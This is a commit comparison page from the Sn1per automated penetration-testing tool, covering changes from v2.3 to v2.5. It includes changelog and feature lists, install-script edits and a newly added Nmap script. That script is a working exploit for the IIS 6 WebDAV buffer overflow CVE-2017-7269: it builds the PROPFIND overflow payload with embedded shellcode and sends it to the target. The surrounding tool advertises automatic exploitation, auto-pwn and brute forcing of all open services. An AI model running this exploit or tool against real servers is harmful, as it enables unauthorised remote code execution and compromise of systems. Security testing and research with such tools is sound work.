BitMaster/Sn1per
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: BitMaster:v2.3
Branches Tags
BitMaster:master
BitMaster:v9.2 BitMaster:v9.1 BitMaster:v9.0 BitMaster:v8.9 BitMaster:v8.8 BitMaster:v8.7 BitMaster:v8.6 BitMaster:v8.5 BitMaster:v8.4 BitMaster:v8.3 BitMaster:v8.2 BitMaster:v8.1 BitMaster:v8.0 BitMaster:v7.4 BitMaster:v7.3 BitMaster:v7.2 BitMaster:v7.1 BitMaster:v7.0 BitMaster:v6.2 BitMaster:v6.1 BitMaster:v6.0 BitMaster:v5.10 BitMaster:v5.9 BitMaster:v5.8 BitMaster:v5.7 BitMaster:v5.6 BitMaster:v5.5 BitMaster:v5.4 BitMaster:v5.3 BitMaster:v5.2 BitMaster:v5.1 BitMaster:v5.0 BitMaster:v4.4 BitMaster:v4.3 BitMaster:v4.2 BitMaster:v4.1 BitMaster:v4.0 BitMaster:v3.0 BitMaster:v2.9 BitMaster:v2.8 BitMaster:v2.7 BitMaster:v2.6c BitMaster:v2.6 BitMaster:v2.5 BitMaster:v2.4 BitMaster:v2.3 BitMaster:v2.2 BitMaster:v2.1 BitMaster:v2.0 BitMaster:v1.9 BitMaster:v1.8c BitMaster:v1.8b BitMaster:v1.8a
...
compare: BitMaster:v2.5
Branches Tags
BitMaster:master
BitMaster:v9.2 BitMaster:v9.1 BitMaster:v9.0 BitMaster:v8.9 BitMaster:v8.8 BitMaster:v8.7 BitMaster:v8.6 BitMaster:v8.5 BitMaster:v8.4 BitMaster:v8.3 BitMaster:v8.2 BitMaster:v8.1 BitMaster:v8.0 BitMaster:v7.4 BitMaster:v7.3 BitMaster:v7.2 BitMaster:v7.1 BitMaster:v7.0 BitMaster:v6.2 BitMaster:v6.1 BitMaster:v6.0 BitMaster:v5.10 BitMaster:v5.9 BitMaster:v5.8 BitMaster:v5.7 BitMaster:v5.6 BitMaster:v5.5 BitMaster:v5.4 BitMaster:v5.3 BitMaster:v5.2 BitMaster:v5.1 BitMaster:v5.0 BitMaster:v4.4 BitMaster:v4.3 BitMaster:v4.2 BitMaster:v4.1 BitMaster:v4.0 BitMaster:v3.0 BitMaster:v2.9 BitMaster:v2.8 BitMaster:v2.7 BitMaster:v2.6c BitMaster:v2.6 BitMaster:v2.5 BitMaster:v2.4 BitMaster:v2.3 BitMaster:v2.2 BitMaster:v2.1 BitMaster:v2.0 BitMaster:v1.9 BitMaster:v1.8c BitMaster:v1.8b BitMaster:v1.8a

14 Commits
v2.3 ... v2.5

Author SHA1 Message Date
root
5038bc72a3 Sn1per by 1N3CrowdShield 2017-05-27 17:23:38 -04:00
root
0c5e64c247 Sn1per by 1N3@CrowdShield 2017-05-27 17:21:53 -04:00
root
ee5836588c Sn1per by 1N3@CrowdShield 2017-05-24 11:14:09 -04:00
root
891250db38 Sn1per by 1N3@CrowdShield 2017-05-21 20:53:25 -04:00
root
ade779356b Sn1per by 1N3@CrowdShield 2017-05-18 22:38:02 -04:00
root
b94e67dfe1 Sn1per by 1N3@CrowdShield 2017-05-14 12:52:17 -04:00
root
043182dcd5 Sn1per by 1N3@CrowdShield 2017-05-11 18:34:59 -04:00
root
b4b1356a1e Sn1per by 1N3@CrowdShield 2017-05-07 19:25:06 -04:00
root
2ec9147e33 Sn1per by 1N3@CrowdShield 2017-05-07 19:20:19 -04:00
root
10399b6554 Sn1per by 1N3@CrowdShield 2017-04-09 19:30:00 -04:00
root
abeff50be3 Sn1per by 1N3@CrowdShield 2017-04-05 00:00:29 -04:00
root
ff22eb92ff Sn1per by 1N3@CrowdShield 2017-03-16 12:33:11 -04:00
root
fe4587a34c Sn1per by 1N3@CrowdShield 2017-02-18 13:15:38 -05:00
root
e190ab3b78 Sn1per by 1N3@CrowdShield 2017-02-16 10:46:58 -05:00
7 changed files with 473 additions and 100 deletions
Expand all files Collapse all files

27
CHANGELOG.md
View File

@@ -1,4 +1,27 @@
## CHANGELOG:
* v2.5 - Added HTML report generation via sniper 'loot' command
* v2.5 - Added automatic NMap searchsploit integration to find exploits
* v2.5 - Added various improvements to Sn1per discovery scan mode
* v2.5 - Fixed issue with IIS BoF NMap script (CC. ifly53e)
* v2.4f - Fixed issue with upper NMap port range(CC. DaveW)
* v2.4e - Added NMap no ping switch to all scans
* v2.4d - Fixed issue with rpcinfo install script
* v2.4d - Fixed issue with Arachni install script
* v2.4c - Added loot and $TARGET sanity checks (CC. @menzow)
* v2.4b - Fixed issue with discovery scan output file (CC. @ifly53e)
* v2.4b - Fixed issue with Intel AMT RCE port list
* v2.4a - Added all NMap script checks via 'fullportonly' mode
* v2.4a - Added JBoss JMX Console Beanshell Deployer WAR Upload and Deployment Metasploit exploit
* v2.4a - Added Java RMI RCE NMap/Metasploit detection
* v2.4a - Added INTEL-SA-00075 (Intel AMT) vulnerability NMap script
* v2.4 - Added detection for open X11 servers
* v2.4 - Added IIS6 Win2k3 RCE NMap script
* v2.4 - Added option to disable Google Hacking queries via Firefox
* v2.3d - Fixed issue with loot command
* v2.3c - Added Apache Struts 2 RCE NMap script
* v2.3c - Added Apache Struts 2 RCE NMap exploit
* v2.3b - Changed NMap scan options to exclude ping sweeps (-P0)
* v2.3a - Fixed minor issue with MSSQL NMap script command (CC. @helo86)
* v2.3 - Fixed minor issues with missing $TARGET definitions for NMap (CC. @helo86)
* v2.2f - Added various optimizations and minor code fixes
* v2.2e - Changed NMap scan options (removed -P0 flag)
@@ -136,3 +159,7 @@
## FUTURE:
* Add auto logging and reporting to all scans
* Add HTML reporting for scans
* Add automated Wireless attacks to Sn1per
* Add automated MITM attacks to Sn1per
* Add web mode port option for customized web scans

19
README.md
View File

@@ -9,17 +9,26 @@ Sn1per is an automated scanner that can be used during a penetration test to enu
## FEATURES:
* Automatically collects basic recon (ie. whois, ping, DNS, etc.)
* Automatically launches Google hacking queries against a target domain
* Automatically enumerates open ports
* Automatically brute forces sub-domains and DNS info
* Automatically enumerates open ports via NMap port scanning
* Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
* Automatically checks for sub-domain hijacking
* Automatically runs targeted NMap scripts against open ports
* Automatically runs targeted Metasploit scan and exploit modules
* Automatically scans all web applications for common vulnerabilities
* Automatically brute forces all open services
* Automatically exploit remote hosts to gain remote shell access
* Performs high level enumeration of multiple hosts
* Automatically brute forces ALL open services
* Automatically test for anonymous FTP access
* Automatically runs WPScan, Arachni and Nikto for all web services
* Automatically enumerates NFS shares
* Automatically test for anonymous LDAP access
* Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities
* Automatically enumerate SNMP community strings, services and users
* Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067
* Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers
* Automatically tests for open X11 servers
* Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
* Performs high level enumeration of multiple hosts and subnets
* Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
* Automatically gathers screenshots of all web sites
* Create individual workspaces to store all scan output
## KALI LINUX INSTALL:

5
TODO.md
View File

@@ -1,3 +1,8 @@
###TODO:
* Add web port scans for directed web scans
* Add various modes (airstrike,nuke,web,etc.) for discovery scans
* Add automatic reporting for all scans by default
* Add Metasploit RCE exploit for MS17-010 (ETTERNALBLUE)
* Add Metasploit RCE exploit for CVE-2016-6366 (EXTRABACON)
* Add reporting for discover mode

181
bin/iis-buffer-overflow.nse Normal file
View File

@@ -0,0 +1,181 @@
local nmap = require "nmap"
local string = require "string"
local shortport = require "shortport"
local vulns = require "vulns"
-- NSE Buffer Overflow vulnerability in IIS
---
-- @usage
-- ./nmap iis-buffer-overflow <target>
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | iis-buffer-overflow:
-- | VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
-- | State: LIKELY_VULNERABLE
-- | Risk factor: High CVSS: 10.0
-- | Description:
-- | Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
-- | service in Internet Information Services (IIS) 6.0
-- | in Microsoft Windows Server 2003 R2 allows remote attackers to execute
-- | arbitrary code via a long header beginning with "If: <http://" in a
-- | PROPFIND request, as exploited in the wild in July or August 2016.
-- |
-- | Original exploit by Zhiniang Peng and Chen Wu.
-- |
-- | References:
-- | https://github.com/edwardz246003/IIS_exploit,
-- |_ https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
--
author = {
"Zhiniang Peng", -- Original author
"Chen Wu", -- Original author
"Rewanth Cool" -- NSE script author
}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit", "vuln", "intrusive"}
portrule = shortport.portnumber(80, "tcp")
action = function(host, port)
local socket, response, try, catch, payload, shellcode, vulnerable_name
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
state = vulns.STATE.NOT_VULN,
risk_factor = "High",
description = [[
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
Original exploit by Zhiniang Peng and Chen Wu.
]],
IDS = {
CVE = 'CVE-2017-7269'
},
scores = {
CVSS = '10.0'
},
references = {
'https://github.com/edwardz246003/IIS_exploit',
'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
},
dates = {
disclosure = {year = '2017', month = '03', day = '26'},
}
}
-- If domain name doesn't exist this line of code takes ip into consideration
vulnerable_name = host.targetname or host.ip
socket = nmap.new_socket()
catch = function()
socket:close()
end
try = nmap.new_try(catch)
try(socket:connect(host, port))
-- Crafting the payload by parts
-- Crafting the request with HTTP PROPFIND method
payload = 'PROPFIND / HTTP/1.1\r\nHost: ' .. vulnerable_name .. '\r\nContent-Length: 0\r\n'
payload = payload .. 'If: <http://' .. vulnerable_name .. '/aaaaaaa'
-- Random text added to payload (Can be modified only for experimental purposes)
payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
payload = payload .. '\xb3\xe3\x95\xb7'
-- Main payload (Do not edit this part)
payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
payload = payload .. '>'
payload = payload .. ' (Not <locktoken:write1>) <http://' .. vulnerable_name .. '/bbbbbbb'
-- Random text added to payload (Can be modified only for experimental purposes)
payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'
-- Main payload (Do not edit this part)
payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
-- Shellcode
shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
shellcode = shellcode .. 'BAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V'
shellcode = shellcode .. '3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O0'
shellcode = shellcode .. '2LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ'
shellcode = shellcode .. '2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1'
shellcode = shellcode .. 'KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
payload = payload .. shellcode
payload = payload .. '>\r\n\r\n'
-- Exploiting the vulnerability
try(socket:send(payload))
-- We receive a 200 response if the payload succeeds.
response = try(socket:receive_bytes(80960))
socket:close()
-- Checking for 200 response in the response
local regex = "HTTP/1.1 (%d+)"
local status = string.match(response, regex)
if status == '200' then
-- Buffer overflow is successfully executed on the server.
vuln.state = vulns.STATE.EXPLOIT,
vuln.exploit_results = response
elseif status == '400' then
-- Bad request error is occured because webdav is not installed.
vuln.state = vulns.STATE.LIKELY_VULN,
vuln.exploit_results = "Server returned 400: Install webdav and try again."
elseif status == '502' then
-- Likely to have an error in the Server Name
vuln.state = vulns.STATE.LIKELY_VULN,
vuln.exploit_results = "Server returned 502: Please try to change ServerName and run the exploit again"
elseif status ~= nil then
vuln.exploit_results = response
end
return vuln_report:make_output(vuln)
end

5
build.sh Normal file
View File

@@ -0,0 +1,5 @@
#!/bin/bash
# build script to push to github...
git add *
git commit -m 'Sn1per by 1N3CrowdShield'
git push origin master

8
install.sh
View File

@@ -36,8 +36,8 @@ cp -Rf $PWD/* $INSTALL_DIR
cd $INSTALL_DIR
echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
apt-get install ruby rubygems python dos2unix zenmap sslyze uniscan xprobe2 cutycapt unicornscan waffit host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
pip install dnspython colorama tldextract urllib3 ipaddress arachni
apt-get install ruby rubygems python dos2unix zenmap sslyze arachni rpcbind uniscan xprobe2 cutycapt unicornscan waffit host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
pip install dnspython colorama tldextract urllib3 ipaddress aha
echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
gem install rake
@@ -47,6 +47,7 @@ echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
rm -Rf Findsploit/ BruteX/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/ testssl.sh/ SimpleEmailSpoofer/ ssh-audit/ plugins/ 2> /dev/null
mkdir $PLUGINS_DIR
cd $PLUGINS_DIR
mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
git clone https://github.com/1N3/Findsploit.git
@@ -63,6 +64,9 @@ git clone https://github.com/nccgroup/shocker.git
git clone https://github.com/drwetter/testssl.sh.git
git clone https://github.com/lunarca/SimpleEmailSpoofer
git clone https://github.com/arthepsy/ssh-audit
wget https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse -O /usr/share/nmap/scripts/http-vuln-cve2017-5638.nse
wget https://raw.githubusercontent.com/xorrbit/nmap/865142904566e416944ebd6870d496c730934965/scripts/http-vuln-INTEL-SA-00075.nse -O /usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse
cp $INSTALL_DIR/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse
echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
cd $PLUGINS_DIR/Findsploit/ && bash install.sh
cd $PLUGINS_DIR/BruteX/ && bash install.sh

328
sniper
View File

@@ -2,37 +2,86 @@
# + -- --=[Sn1per by 1N3
# + -- --=[http://crowdshield.com
#
# Sn1per - Automated Pentest Recon Tool
#
# FEATURES:
# - Automatically collect recon info (ie. whois, ping, DNS, etc.)
# - Automatically collects Google hacking recon info
# - Automatically run port scans
# - Automatically brute force sub-domains via DNS
# - Automatically checks for sub-domain hijacking
# - Automatically run targeted nmap scripts against open ports
# - Automatically scans all web applications
# - Automatically brute forces all open services
# - Automatically runs targeted metasploit scan and exploit modules
# - Automatically scan multiple hosts
#
# INSTALL:
# ./install.sh - Installs all dependencies. Best run from Kali Linux.
#
# USAGE:
# sniper <target>
# sniper <target> <report>
# sniper <CIDR> discover <report>
# sniper <target> stealth <report>
# sniper <target> port <portnum>
# sniper <target fullportonly <portnum>
# sniper <target> web <report>
# sniper <targets.txt> airstrike <report>
# sniper <targets.txt> nuke <report>
# sniper loot
#
## ABOUT:
#Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities.
VER="2.3"
## DEMO VIDEO:
#[![Sn1per Demo](https://img.youtube.com/vi/nA_V_u3QZA4/0.jpg)](https://www.youtube.com/watch?v=nA_V_u3QZA4)
## FEATURES:
#* Automatically collects basic recon (ie. whois, ping, DNS, etc.)
#* Automatically launches Google hacking queries against a target domain
#* Automatically enumerates open ports via NMap port scanning
#* Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
#* Automatically checks for sub-domain hijacking
#* Automatically runs targeted NMap scripts against open ports
#* Automatically runs targeted Metasploit scan and exploit modules
#* Automatically scans all web applications for common vulnerabilities
#* Automatically brute forces ALL open services
#* Automatically test for anonymous FTP access
#* Automatically runs WPScan, Arachni and Nikto for all web services
#* Automatically enumerates NFS shares
#* Automatically test for anonymous LDAP access
#* Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities
#* Automatically enumerate SNMP community strings, services and users
#* Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067
#* Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers
#* Automatically tests for open X11 servers
#* Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
#* Performs high level enumeration of multiple hosts and subnets
#* Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
#* Automatically gathers screenshots of all web sites
#* Create individual workspaces to store all scan output
## KALI LINUX INSTALL:
#```
#./install.sh
#```
## DOCKER INSTALL:
#Docker Install:
#https://github.com/menzow/sn1per-docker
#Docker Build:
#https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/
#Example usage:
#```
#$ docker pull menzo/sn1per-docker
#$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io
#```
## USAGE:
#```
#sniper <target> <report>
#sniper <target> stealth <report>
#sniper <CIDR> discover
#sniper <target> port <portnum>
#sniper <target> fullportonly <portnum>
#sniper <target> web <report>
#sniper <target> nobrute <report>
#sniper <targets.txt> airstrike <report>
#sniper <targets.txt> nuke <report>
#sniper loot
#```
### MODES:
#* **REPORT:** Outputs all results to text in the loot directory for later reference. To enable reporting, append 'report' to any sniper mode or command.
#* **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
#* **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
#* **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
#* **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.
#* **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
#* **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services.
#* **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
#* **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
#* **LOOT:** Automatically organizes and displays loot folder in your browser and opens Metasploit Pro and Zenmap GUI with all port scan results. To run, type 'sniper loot'.
## SAMPLE REPORT:
# https://gist.github.com/1N3/8214ec2da2c91691bcbc
VER="2.5"
TARGET="$1"
MODE="$2"
OPT1="$3"
@@ -48,7 +97,9 @@ USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
PASS_FILE="/usr/share/brutex/wordlists/password.lst"
DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
SUPER_MICRO_SCAN="/usr/share/sniper/plugins/SuperMicro-Password-Scanner/supermicro_scan.sh"
DEFAULT_PORTS="21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,27017,27018,27019,28017,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
DEFAULT_PORTS="21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,623,624,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,16992,27017,27018,27019,28017,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
DEFAULT_TCP_PORTS="21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,623,624,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,16992,27017,27018,27019,28017,49152"
DEFAULT_UDP_PORTS="53,67,68,88,161,162,137,138,139,389,520,2049"
THREADS="30"
OKBLUE='\033[94m'
OKRED='\033[91m'
@@ -65,8 +116,22 @@ AUTOBRUTE="1"
# DEFAULT IS "1" (ENABLED)
FULLNMAPSCAN="1"
# ENABLE/DISABLE AUTOMATIC GOOGLE HACKING QUERIES
# DEFAULT IS "1" (ENABLED)
GOOHAK="1"
cd $INSTALL_DIR
function init {
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
TARGET="$(echo $TARGET | sed 's/https:\/\///g' | sed 's/http:\/\///g')"
}
function loot {
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
@@ -87,8 +152,13 @@ function loot {
echo -e "$OKORANGE + -- --=[Generating reports...$RESET"
for a in `ls sniper-*.txt 2>/dev/null`;
do
echo "$a" > $LOOT_DIR/reports/$a
